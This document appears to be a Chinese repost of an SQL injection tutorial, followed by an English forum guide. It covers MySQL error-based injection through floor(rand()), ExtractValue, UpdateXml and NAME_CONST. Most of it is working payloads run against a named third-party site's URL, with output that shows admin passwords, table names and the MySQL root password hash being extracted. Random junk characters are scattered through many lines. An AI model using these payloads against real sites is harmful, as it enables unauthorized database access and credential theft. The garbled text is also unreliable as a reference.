mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

admin

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下：
3 P+ a2 j: r. a' t5 z5 G首先进行正常查询：

mysql> select * from article where id = 1;
+—-+——-+———+
| id | title | content |
3 S; u" T- o/ i+—-+——-+———+
# B1 r1 T7 a, @  l/ \2 D4 G|  1 | test  | do it   |
+—-+——-+———+

假如id输入存在注入的话，可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
* Y+ B) q2 z- Y) i# G/ t3 a3 O1 zERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本，如果需要查询其他数据，可以通过修改version()所在位置语句进行查询。
% _$ M0 i. _5 X2 C( q. W% o例如我们需要查询管理员用户名和密码：

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));
; `% m; d" t  k- X; h& A0 h; xERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue
测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’

4 s, @" `) E/ D$ H9 h- j

再收集：

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
: d7 H% V. v. d# V- q: P
! C2 V" }4 `# ]; f. W7 l3 QErroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
" L; u+ z, O& m
! L5 V. n/ s* O1 khttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
. d* E4 ~) o+ g: {8 N; J$ t
: `5 I: v) ^$ d4 xErroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′

" L7 A, }6 b2 m6 p. E0 TMYSQL高版本报错注入技巧-利用NAME_CONST注入
5 Z) [$ J5 U+ N5 uIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
3 Y, l5 W, b0 e1 b, x

相关信息

  v) s# m; k: i. LNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
& u& I4 B1 _/ D) R2 `NAME_CONST(DATA, VALUE)
) \7 s' f2 e2 x, Z
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
0 T5 X( a# j3 R) c! k5 O" V1 D
SELECT NAME_CONST('TEST', 1)


0 }$ W. U8 Z# k- \" d
* i$ w6 C  K' c6 F2 F3 [9 b|---------------|
& T2 R; z. S2 T! R1 `- ~1 ]( R|     TEST      |
# ^% a% `1 o" J3 Z( n|               |
2 L$ U2 R: N5 ?) r" @! w4 Y( o|---------------|
|       1       |
% Y  k& H" s5 ]8 Q! L|               |
. O3 f9 {1 }. S# P% m& W, y|---------------|

$ q& d5 t/ V9 J! T


! ~$ {6 f! w1 ^: whttp://dev.mysql.com/doc/refman/5.0/en/m...name-const
- P5 Z' u) ?: E3 a. W0 B+ a+ V3 V! PIntro to MySQL Variables
$ u3 S/ R- |+ {7 K/ X9 s" w
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
2 \6 d6 L" _1 d5 U% j0 K
Code:
" h1 D; D4 A$ xhttp://www.baido.hk/qcwh/content ... ;sid=19&cid=261




+ t7 l9 U% P  p, r# m
& L0 p, b% l/ j7 ^8 ]( D; x6 }6 J: R" _" WCode:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--


9 n/ R, x0 L+ H- Q$ YVAR = Your MySQL variable.

' U0 c# u& V) t# h  R% wMySQL 5.1.3 Server System Variables
& }9 l* s! U2 p
0 h3 V  o3 H  K# E5 U  CLet's try it out on my site..
, B  d( `" W$ g2 y4 F3 ~
Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
1 N- j4 d+ p- R5 @- n0 {  D) H" [+ Z
) i  `# e) X( z6 S% z. ?! x0 ?Erroruplicate column name '5.0.27-community-nt'

6 J" U+ k$ G" g8 X
% A* b3 B8 a2 J0 D1 y
# b, D, a6 e9 a0 y
, j9 s4 L/ H% `+ o1 D1 x3 s& W: n+ Y0 G
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...

/ a2 `& [+ {0 i) @Data Extraction

Code:
/ C1 m) X7 @! o9 Z+ m" j% b5 J% D+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

/ K, u7 H& _/ S3 s
0 u; f" \8 h; uWe should get a duplicate column 1 error...

Code:
. d: p) B. g0 a, v1 d1 U6 @' ^( {http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
5 o! S2 I( {# Y8 {# z! d
5 s0 [8 c& E# V, M7 yErroruplicate column name '1


. S5 ?2 i& N+ i8 |) N/ k6 z6 \

" q3 B$ [, ^# ]& V2 }

Now let's get the tables out this bitch..
$ `, Y$ f" ?7 n  n% z
/ s! c, @* ?8 ~% l' \4 A3 G- gCode:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--


" H! K' A- `# |+ `/ S4 NLet's see if it works here, if it does, we can go on and finish the job.

( L$ M+ |" h! x( [9 rCode:
" C3 w2 B" U: C7 p/ h2 K# Yhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

5 j# `7 z$ A, |
Erroruplicate column name 'com_admanage

! w8 m5 \* F' D- y
/ F1 h% w0 V% b7 Y2 d0 ~1 ^& W: }" @& Q
' k2 |+ v5 o7 w7 `- C; X- r- i: W
+ u" ]# q& g4 T5 W
2 _% P8 g$ {5 n8 p1 M
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..
! L1 Y; ]3 u1 d) n7 Z6 m7 Q9 {
9 E) w# x0 O; q" ?Code:
4 [5 @/ v3 y, H0 R+ H) t$ a+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

% @; t" l+ `& e. }' P) A: E% g
& M9 ]0 O" _! Y9 f3 T- zSo mine looks like this, and I get the duplicate column name 'Host'.
2 B  f: j9 e+ A; u, N
0 x: e0 |4 \0 R; KCode:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

0 t. F' W; ?8 d) _/ o( y8 H& OErroruplicate column name 'Host'
% O" U4 t/ Z* ?


/ a! {2 Q. {, g; C% X3 p" F
. I( e5 }9 R; p' C/ h- z. I+ g
  m! U/ r! e) g( w- I
' {6 }! y( t( \Woot, time to finish this bitch off.

Code:
/ f/ h/ [  Q+ O5 R5 `: X% J6 L) P+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
# y0 A! R# x. J

, i" @4 X) t. n) o( k1 U# _So mine looks like this...

) f5 u1 \2 H+ u1 v8 PCode:
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
9 J, K- f# `4 A9 C9 ?
( U0 b. m# A+ {* N8 PErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
3 v- D% ]6 A( `


+ C0 l8 b$ L7 P& h. _
% s# O8 e( B# P. C

% G2 X# A) G4 NAnd there we have it, thanks for reading.
( f$ u) Z+ S1 M- ?1 ~# f5 h